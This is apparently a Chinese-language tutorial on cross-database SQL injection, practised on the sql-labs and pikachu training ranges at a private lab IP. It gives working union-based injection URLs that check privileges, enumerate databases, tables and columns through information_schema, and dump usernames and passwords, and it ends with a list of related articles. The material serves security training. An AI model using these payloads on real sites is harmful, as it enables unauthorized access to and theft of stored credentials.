SQL注入—跨库注入
SQL注入—跨库注入
- 1.SQL注入—跨库注入
- 1.1.前言
- 1.2.跨库注入介绍
- 2.跨库注入
- 2.1.跨库注入准备
- 2.2.跨库注入流程
- 2.2.1.判断是否为管理员权限
- 2.2.2.获取数据库下所有库
- 2.2.3.获取pikachu下的表
- 2.2.4.获取pikachu表中列
- 2.2.5.获取pikachu列中数据
1.SQL注入—跨库注入
1.1.前言
该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。
SQL注入基础原理与案例:参考文章
1.2.跨库注入介绍
跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。
简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入。
2.跨库注入
2.1.跨库注入准备
这里我们采用联合注入方式进行演示,其它的注入方式都是一样的操作,前提是需要拥有管理员权限。
同时采用sql-labs靶场来演示,sql-labs靶场安装可以参考以下链接。
sql-labs靶场安装:靶场安装
2.2.跨库注入流程
这里前期寻找注入点什么时候都不说了,直接判断并进行测试。
2.2.1.判断是否为管理员权限
可以看到这里是为root权限,而且当前网站的数据库是security,那么我们该如何进行跨库注入,不过这里我们已经获取到的是管理员权限,那么我们就已经完成了前置条件了。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,user(),database()--+
2.2.2.获取数据库下所有库
这里我们就使用information_schema.schemata获取所有的数据库名,由于在Mysql>5.0版本的时候都会将所有库、所有表、所有列都会放在一张统一的表中,具体的原因还需要去了解数据库,这里我也过多的解释,我们看如何使用即可。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
2.2.3.获取pikachu下的表
这里我们可以看到,获取到了pikachu数据库,那么我们就读取pikachu数据库下的表。
需要注意并不是读sql-labs的数据库哦,sql-labs数据库名叫security,而pikachu数据库是pikachu靶场的数据库哦,来实现跨库注入。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'--+
2.2.4.获取pikachu表中列
这里我们获取pikachu中的users表走的列。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'--+
2.2.5.获取pikachu列中数据
这里需要注意,先写数据库名,如何在写数据库表名,例如:数据库名.数据库表名。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users--+
SQL注入—跨库注入相关推荐
- (13)web安全|渗透测试|网络安全 注入/跨库查询/文件读写/常见的防护原理 详细图解
目录 高权限注入及低权限注入 跨库查询: 文件读写操作 流程: 找路径: 方法一: 方法二: 方法三: 方法四: 方法五: 方法六: 方法七: 知道路径后,再执行文件的读写操作 文件的写入: 可能遇到 ...
- SQL Server跨库查询
跨服务器数据库查询 --连接远程/局域网数据(openrowset/openquery/opendatasource) --1.openrowset (比较推荐这种做法) --查询示例 selec ...
- SQL Server 跨库同步数据
最近有个需求是要跨库进行数据同步,两个数据库分布在两台物理计算机上,自动定期同步可以通过SQL Server代理作业来实现,但是前提是需要编写一个存储过程来实现同步逻辑处理.这里的存储过程用的不是op ...
- SQL Server 跨库查询
1. 开启Ad Hoc Distributed Queries组件,在sql查询编辑器中执行如下语句: exec sp_configure 'show advanced options',1 reco ...
- 进阶技能篇:SQL的跨库查询与链接服务器
各位小伙伴们,关于MSSQL的基本技能篇前面一共写了10篇,也基本上算是告一段落,接下来将开始介绍进阶技能篇.在构思这个进阶技能篇的时候,一直在考虑先写哪个,其实到看到这部分内容能理解的人,基本上对S ...
- sql注入***的各种注入方法
ASP编程门槛很低,新手很容易上路.在一段不长的时间里,新手往往就已经能够编出看来比较完美的动态网站,在功能上,老手能做到的,新手也能够做到.那么新手与老手就没区别了吗?这里面区别可就大了,只不过外行 ...
- B站小迪安全笔记第十三天-SQL注入(MYSQL注入)
前言: MYSQL 注入中首先要明确当前注入点权限,高权限注入时有更多的 攻击手法,有的能直接进行 getshell 操作.其中也会遇到很多阻碍,相关 防御方案也要明确,所谓知己知彼,百战不殆.不论作 ...
- mysql注入大全_mysql注入大全及防御
0.明白存在的位置:get型 post型 cookie型 http头注入 1.先测试注入点,注册框.搜索框.地址栏啥的,判断是字符型,搜索型还是数字型 字符型 1' and '1'='1 成功, 1' ...
- SQL注入语义分析库libinjection
文章目录 SQL注入语义分析库libinjection 什么是libinjection libinjection和正则表达式 modsecurity 如何使用libinjection ModSecur ...
最新文章
- Resharper的使用
- 目标还是中国人,纽约智慧城市项目想通过EB-5募资10亿
- 解决navicate 连接mysql数据库中文乱码的问题
- JVM - 基本类型的包装类和对象池
- 牛客一 K-Knowledge Test about Match
- SQL中group by的用法
- Python爬虫之xpath的详细使用(爬虫)
- android+场景切换,Android共享元素场景切换动画的实现
- html页面跨域提交数据,前端跨域的整理
- Ubuntu 10.4速配指南
- 2021年中国动态内容交付市场趋势报告、技术动态创新及2027年市场预测
- 达梦数据库 函数操作
- Velocity 语法(转)
- CATIA VBA二次开发介绍
- [乐意黎]某音上超酷炫的 Word Clock 文字云时钟屏保配置
- 请问悉尼大学计算机专业,悉尼大学计算机专业去留学怎么样 是强势专业吗?...
- 美团前期运营模式(怎么吸引商家入驻?怎么吸引用户?)
- 返利平台php,MallWWI新模式返利商城系统 php版 v1.2.7
- Git error. Command: `git clone --mirror git://github.com/Sky24n/FlutterRepos.git
- 基于R16标准的5G电力高精度授时解决方案PTP授时方案